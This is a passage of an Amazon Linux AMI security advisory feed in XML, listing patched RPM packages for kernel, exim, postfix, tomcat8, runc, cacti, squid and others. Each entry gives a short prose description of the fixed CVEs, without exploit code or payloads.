</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6606" title="" id="CVE-2023-6606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="178.554.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-178.554.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1907</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1907: medium priority package update for nss-softokn</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5388:
It was discovered that the numerical library used in NSS for RSA cryptography leaks information whether high order bits of the RSA decryption result are zero. This information can be used to mount a Bleichenbacher or Manger like attack against all RSA decryption operations. As the leak happens before any padding operations, it affects all padding modes: PKCS#1 v1.5, OAEP, and RSASVP. Both API level calls and TLS server operation are affected.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5388" title="" id="CVE-2023-5388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-debuginfo" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-softokn-3.53.1-6.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1908</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1908: important priority package update for exim</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51766:
Exim through 4.97 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Exim supports <LF>.<CR><LF> but some other popular e-mail servers do not.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51766" title="" id="CVE-2023-51766" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-mon-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1909</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1909: medium priority package update for tomcat8</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46589:
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46589" title="" id="CVE-2023-46589" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.96" release="1.96.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.96-1.96.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1910</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1910: important priority package update for apache-ivy</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37866:
When Apache Ivy downloads artifacts from a repository it stores them in the local file system based on a user-supplied "pattern" that may include placeholders for artifacts coordinates like the organisation, module or version. If said coordinates contain "../" sequences - which are valid characters for Ivy coordinates in general - it is possible the artifacts are stored outside of Ivy's local cache or repository or can overwrite different artifacts inside of the local cache. In order to exploit this vulnerability an attacker needs collaboration by the remote repository as Ivy will issue http requests containing ".." sequences and a "normal" repository will not interpret them as part of the artifact coordinates. Users of Apache Ivy 2.0.0 to 2.5.1 should upgrade to Ivy 2.5.1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37866" title="" id="CVE-2022-37866" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-ivy" version="2.2.0" release="5.3.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-2.2.0-5.3.amzn1.noarch.rpm</filename></package><package name="apache-ivy-javadoc" version="2.2.0" release="5.3.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-javadoc-2.2.0-5.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1911</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1911: important priority package update for runc</title><issued date="2024-01-25 19:21:00" /><updated date="2024-01-31 23:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-21626:
AWS is aware of CVE-2024-21626, an issue affecting the runc component of several open source container management systems. Under certain conditions, an actor could leverage a specially crafted container or container configuration to access files or directories outside the container's file system namespace.
An updated version of runc that addresses the issue is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or any container-related software apply those updates or a newer version.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21626" title="" id="CVE-2024-21626" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.1.11" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.1.11-1.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.1.11" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.1.11-1.1.amzn1.x86_64.rpm</filename></package><package name="runc" version="1.1.11" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/runc-1.1.11-1.1.amzn1.i686.rpm</filename></package><package name="runc-debuginfo" version="1.1.11" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/runc-debuginfo-1.1.11-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1912</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1912: important priority package update for kernel</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6931:
A heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation.
A perf_event's read_size can overflow, leading to a heap out-of-bounds increment or write in perf_read_group().
We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.
CVE-2023-6040:
An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family). While creating a new netfilter table, the lack of a safeguard against invalid nf_tables family (pf) values within the `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040" title="" id="CVE-2023-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6931" title="" id="CVE-2023-6931" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="179.557.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" 
release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1913</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1913: important priority package update for libtiff</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6277:
An out-of-memory flaw was found in libtiff. Passing a crafted tiff file to the TIFFOpen() API may allow a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6277" title="" id="CVE-2023-6277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1914</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1914: important priority package update for postfix</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51764:
Postfix through 3.8.4 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required: the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51764" title="" id="CVE-2023-51764" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postfix" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-debuginfo" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-debuginfo-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-perl-scripts" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-perl-scripts-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-debuginfo" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-debuginfo-2.6.6-2.17.amzn1.i686.rpm</filename></package><package name="postfix" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-2.6.6-2.17.amzn1.i686.rpm</filename></package><package name="postfix-perl-scripts" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-perl-scripts-2.6.6-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1915</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1915: important priority package update for cacti</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51448:
Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `'managers.php'`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `'/cacti/managers.php'` with an SQLi payload in the `'selected_graphs_array'` HTTP GET parameter. As of time of publication, no patched versions exist.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51448" title="" id="CVE-2023-51448" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="6.24.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-6.24.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1916</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1916: important priority package update for squid</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-50269:
Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50269" title="" id="CVE-2023-50269" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.54.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.54.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1917</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1917: low priority package update for sudo</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-28 23:54:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.58.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.58.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.58.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1918</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1918: important priority package update for php73</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
CVE-2019-11050:
